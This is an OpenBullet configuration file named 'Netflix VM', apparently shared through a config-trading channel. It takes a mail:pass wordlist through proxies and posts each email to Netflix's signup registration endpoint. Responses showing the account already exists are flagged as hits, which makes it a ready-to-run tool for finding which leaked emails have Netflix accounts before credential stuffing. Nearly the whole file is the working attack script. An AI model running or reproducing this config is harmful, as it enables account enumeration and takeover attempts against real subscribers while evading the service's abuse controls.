[SETTINGS]
{
  "Name": "Netflix VM",
  "SuggestedBots": 85,
  "MaxCPM": 0,
  "LastModified": "2023-01-09T14:39:50.157308+03:30",
  "AdditionalInfo": "Join @OpenBullet_CFGs | Xreactor.org",
  "RequiredPlugins": [],
  "Author": "Im3eyyeD",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": true,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/" 
  
  SECPROTO TLS11 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,fa;q=0.8,fr;q=0.7,ru;q=0.6" 
  HEADER "cache-control: max-age=0" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"106\", \"Google Chrome\";v=\"106\", \"Not;A=Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: none" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 

PARSE "<SOURCE>" LR "\"authURL\":\"" "\"" -> VAR "authURL" 

FUNCTION Unescape "<authURL>" -> VAR "authURL" 

FUNCTION URLEncode "<authURL>" -> VAR "authURL" 

PARSE "<SOURCE>" LR "\"data\":{\"esn\":\"" "\"" EncodeOutput=TRUE -> VAR "esn" 

FUNCTION Length "allocations=%7B%2247988%22%3A7%2C%2248816%22%3A4%7D&esn=<esn>&authURL=<authURL>&param=%7B%22flow%22%3A%22signupSimplicity%22%2C%22mode%22%3A%22registration%22%2C%22action%22%3A%22registerOnlyAction%22%2C%22fields%22%3A%7B%22email%22%3A%7B%22value%22%3A%22<USER>%22%7D%2C%22password%22%3A%7B%22value%22%3A%22<USER>%22%7D%2C%22emailPreference%22%3A%7B%22value%22%3Afalse%7D%2C%22previousMode%22%3A%22registrationWithContext%22%7D%7D" -> VAR "Lenght" 

REQUEST POST "https://www.netflix.com/api/aui/pathEvaluator/web/%5E2.0.0?landingURL=%2Fsignup%2Fregform&landingOrigin=https%3A%2F%2Fwww.netflix.com&inapp=false&isConsumptionOnly=false&logConsumptionOnly=false&languages=en-US&netflixClientPlatform=browser&supportCategory=innovation&method=call&callPath=%5B%22aui%22%2C%22moneyball%22%2C%22next%22%5D&falcor_server=0.1.0" 
  CONTENT "allocations=%7B%2247988%22%3A7%2C%2248816%22%3A4%7D&esn=<esn>&authURL=<authURL>&param=%7B%22flow%22%3A%22signupSimplicity%22%2C%22mode%22%3A%22registration%22%2C%22action%22%3A%22registerOnlyAction%22%2C%22fields%22%3A%7B%22email%22%3A%7B%22value%22%3A%22<USER>%22%7D%2C%22password%22%3A%7B%22value%22%3A%22<USER>%22%7D%2C%22emailPreference%22%3A%7B%22value%22%3Afalse%7D%2C%22previousMode%22%3A%22registrationWithContext%22%7D%7D" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  SECPROTO TLS11 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,fa;q=0.8,en-GB;q=0.7" 
  HEADER "content-length: 536" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "referer: https://www.netflix.com/signup/regform" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" 
  HEADER "x-netflix.browsername: Edge OSS" 
  HEADER "x-netflix.browserversion: 107" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 
  HEADER "x-netflix.clienttype: akira" 
  HEADER "x-netflix.esnprefix: NFCDIE-03-" 
  HEADER "x-netflix.nq.stack: prod" 
  HEADER "x-netflix.osfullname: Windows 10" 
  HEADER "x-netflix.osname: Windows" 
  HEADER "x-netflix.osversion: 10.0" 
  HEADER "x-netflix.request.routing: {\"path\":\"/nq/aui/endpoint/%5E1.0.0-web/pathEvaluator\",\"control_tag\":\"auinqweb\"}" 
  HEADER "x-netflix.uiversion: v63b8295c" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "mode\":\"switchFlow\"," 
    KEY "value\":\"account_already_exists" 
  KEYCHAIN Failure OR 
    KEY "mode\":\"registrationWithContext" 
    KEY "mode\":\"planSelectionWithContext" 
  KEYCHAIN Custom "FREE" OR 
    KEY "mode\":\"passwordOnly" 

